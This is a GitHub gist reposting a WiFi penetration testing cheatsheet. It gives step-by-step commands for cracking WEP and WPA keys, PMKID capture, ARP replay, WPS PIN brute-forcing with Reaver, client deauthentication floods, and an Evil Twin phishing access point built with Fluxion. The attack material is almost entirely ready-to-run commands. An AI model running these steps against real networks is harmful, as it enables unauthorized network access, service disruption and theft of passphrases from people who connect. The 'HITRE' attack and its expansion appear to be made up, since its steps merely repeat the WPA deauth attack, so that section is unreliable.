Skip to content

Instantly share code, notes, and snippets.

@atcasanova

atcasanova/wifi-cheatsheet.md

Created May 23, 2023 12:56
Show Gist options
  • Save atcasanova/54c7122a20c5d93fd40c7ee1ebda7839 to your computer and use it in GitHub Desktop.
Save atcasanova/54c7122a20c5d93fd40c7ee1ebda7839 to your computer and use it in GitHub Desktop.
Download ZIP
wifi pentest cheatsheet
Raw
wifi-cheatsheet.md

Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks

WiFi penetration testing is a critical component of network security, aiming to identify vulnerabilities in wireless networks and implement appropriate security measures.

Our WiFi penetration testing cheatsheet covers various techniques and methodologies targeting WEP, WPA, WPA2, and WPA3 encryption standards.

Essential Tools for WiFi Penetration Testing

Here are some popular automated tools for WiFi penetration testing that will be invaluable for your WiFi penetration testing cheatsheet:

WiFi Penetration Testing Cheatsheet:

Step-by-Step Guide for WEP, WPA, PMKID, ARP Request Replay, WPS PIN, HITRE, and Evil Twin Attacks

  • WEP Penetration Testing

    • Enable monitor mode: airmon-ng start wlan0
    • Capture packets: airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
    • Crack the WEP key: aircrack-ng [OUTPUT.cap]

  • WPA Penetration Testing

    • Enable monitor mode: airmon-ng start wlan0
    • Capture WPA handshake: airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
    • Deauthenticate client: aireplay-ng --deauth 5 -a [BSSID] -c [CLIENT] wlan0mon
    • Crack WPA key: aircrack-ng [OUTPUT.cap] -w [WORDLIST]

  • PMKID Attack

    • Enable monitor mode: airmon-ng start wlan0
    • Capture PMKID: hcxdumptool -i wlan0mon --enable_status 3 --filterlist=[TARGETS] --filtermode=2 --outfile=[OUTPUT]
    • Convert to hashcat format: hcxpcaptool -z [HASHFILE] [OUTPUT]
    • Crack PMKID: hashcat -m 16800 [HASHFILE] [WORDLIST] --force

  • ARP Request Replay Attack

    • Enable monitor mode: airmon-ng start wlan0
    • Capture packets: airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
    • Perform ARP request replay: aireplay-ng --arpreplay -b [BSSID] -h [CLIENT] wlan0mon
    • Crack the WEP key: aircrack-ng [OUTPUT.cap]

  • WPS PIN Attack

    • Enable monitor mode: airmon-ng start wlan0
    • Scan for WPS-enabled networks: wash -i wlan0mon
    • Crack WPS PIN using Reaver: reaver -i wlan0mon -b [BSSID] -c [CHANNEL] -vv -K 1
    • Obtain WPA passphrase from cracked PIN.

  • HITRE Attack (Handshake, Interactive, and Timing Resource Exhaustion)

    • Enable monitor mode: airmon-ng start wlan0
    • Capture WPA handshake: airodump-ng --bssid [BSSID] --channel [CHANNEL] --write [OUTPUT] wlan0mon
    • Repeatedly deauthenticate clients: aireplay-ng --deauth [COUNT] -a [BSSID] wlan0mon
    • Crack WPA key: aircrack-ng [OUTPUT.cap] -w [WORDLIST]

  • Evil Twin Attack

    • Install Fluxion: git clone https://github.com/FluxionNetwork/fluxion
    • Run Fluxion: cd fluxion && ./fluxion.sh
    • Select language and follow the on-screen instructions.
    • Choose “Evil Twin AP” attack and configure the fake access point.
    • Capture the WPA passphrase when the victim connects to the fake access point.

source: https://latesthackingnews.com/2023/04/30/wifi-penetration-testing-cheatsheet-for-ethical-hackers/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment